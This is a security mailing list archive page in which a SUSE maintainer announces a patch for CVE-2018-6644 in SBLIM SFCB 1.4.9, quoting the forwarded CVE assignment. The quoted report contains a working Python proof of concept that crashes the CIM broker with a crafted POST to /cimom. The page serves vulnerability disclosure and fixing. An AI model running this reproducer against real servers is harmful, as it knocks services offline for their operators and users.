Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 9 Feb 2018 10:34:44 +0100
From: Marcus Meissner <meissner@...e.de>
To: oss-security@...ts.openwall.com
Subject: Re: Fw:Re: [scr459004] sfcb - 1.4.9

Hi,

Patch from our sblim-sfcb maintainer Adam Majer to fix this issue is attached.

Ciao, Marcus

On Wed, Feb 07, 2018 at 01:04:18PM +0800, XinleiHe wrote:
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> -------- Forwarding messages --------
> From: cve-request@...re.org
> Date: 2018-02-06 04:11:55
> To:  hxl1999@...h.net
> Cc:  cve-request@...re.org
> Subject: Re: [scr459004] sfcb - 1.4.9
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
> 
> The CVE ID is below. Please inform the software maintainer that the
> CVE ID has been assigned.
> 
> 
> > [Suggested description]
> > SBLIM Small Footprint CIM Broker (SFCB) 1.4.9 has a
> > null pointer (DoS) vulnerability via
> > a crafted POST request to the /cimom URI.
> > 
> > ------------------------------------------
> > 
> > [Additional Information]
> > You can use following python code to reproduce this vulnerability.
> > 
> > import httplib
> > from xml.dom.minidom import Document
> > class write_xml(Document):
> >     def __init__(self):
> > 
> >         Document.__init__(self)
> >  
> >     def set_tag(self,tag):
> >         self.tag = tag
> >         self.cim = self.createElement(self.tag)
> >         #self.setAttribute("encoding", "utf-8")
> >         
> >         self.cim.setAttribute("CIMVERSION", "2.0")
> >         self.cim.setAttribute("DTDVERSION", "2.0")
> >         self.appendChild(self.cim)
> > 
> >         self.msg = self.createElement("MESSAGE")
> >         self.msg.setAttribute("ID", "4711")
> >         self.msg.setAttribute("PROTOCOLVERSION","1.0")
> >         self.cim.appendChild(self.msg)
> > 
> >         self.sim = self.createElement("SIMPLEREQ")
> >         self.msg.appendChild(self.sim)
> > 
> >         self.ime = self.createElement("IMETHODCALL")
> >         self.ime.setAttribute("NAME","EnumerateInstances")
> >         self.sim.appendChild(self.ime)
> > 
> >         self.local = self.createElement("LOCALNAMESPACEPATH")
> >         self.ime.appendChild(self.local)
> >           
> >         self.names1=self.createElement("NAMESPACE")
> >         self.names1.setAttribute("NAME", "root")
> >         self.local.appendChild(self.names1)
> > 
> >     def display(self):
> >         print self.toprettyxml(indent="   ")
> >     def retdata(self):
> >         return self.toprettyxml(indent="   ")
> > 
> > def httpreq(data):
> >  conn = httplib.HTTPConnection("127.0.0.1", 5988, False)
> >  conn.request('POST', '/cimom',data)
> >  res = conn.getresponse() 
> > 
> > def main(): 
> >  wx = write_xml()
> >  wx.set_tag('CIM')
> >  print wx.retdata()
> >  print httpreq(wx.retdata())
> > 
> > if __name__=='__main__':
> >  main()
> > 
> > ------------------------------------------
> > 
> > [Vulnerability Type]
> > Buffer Overflow
> > 
> > ------------------------------------------
> > 
> > [Vendor of Product]
> > SBLIM project
> > 
> > ------------------------------------------
> > 
> > [Affected Product Code Base]
> > sfcb - 1.4.9
> > 
> > ------------------------------------------
> > 
> > [Impact Denial of Service]
> > true
> 
> Use CVE-2018-6644.
> 
> 
> - -- 
> CVE Assignment Team
> M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
> [ A PGP key is available for encrypted communications at
>   http://cve.mitre.org/cve/request_id.html ]
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> 
> iQIcBAEBCAAGBQJaeLorAAoJEHb/MwWLVhi2xdoP/2OaKyQzIatRABkB35IlzYpR
> vkjtDA8uXjMIcnuJr/sYa/zVFjIBRFQ2nLRkJs2d5Ni1uNsZ3hGm5A7Tn3RFsEby
> tL6CvtY8h0MBf4xf6ZVdkzwshJyb05qaOB7UfUL5Fskzoxvs2QpcbGKGtbtaKbPU
> YZq4t6aIyZW9UMEwheeCBDzGqC/oLVRUxgztgAy8SIhIlVfwtYEmHvafs11cN2XV
> EjVvIbaOeRlOfelJvlSKCOjHj0vjOesouiGlMLm3nqYXm5en/T66tuCpaajn4zzO
> I/Wj0Fm8tm2w0pkdfcNBewLu7+4bjRsiJ8U0SVPFQaOENvK7C3q6NyrfCgs1qesR
> fr4LS9TfOcuuIjxn9w3T0Hr4nOAJnSwTiwmnuKoQblA/Pn/r8CquyKh/Rh/ST6P7
> YxLUt9ZzXKf2SlWV1q+68N9RvefoXQFgQdAP2eUG0Y2i8ACZmxCPVLMclwUHvYIG
> KFlei2bIp4IADt3zRdndQBzEK1NwFhNwIKSnE7ybRQqFx6yTgoEiOP0CpYZLmRqi
> g94pvunSBKqPcCNhW/C78orO0Tz7UegnkaBMNYgIgW/jCFEiFGSBgi4VIjW8WWrr
> M+BM/UGehRBbGjmRqphsOBHdc1H9VKUAWJ0Y4hzQAd5Y6QCcTWb0uMlbNMjINshR
> 4TNbCFPf5EWJy7Bw8Gic
> =q5wy
> -----END PGP SIGNATURE-----

-- 
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <meissner@...e.de>

View attachment "set_default_content_type.patch" of type "text/x-patch" (2190 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ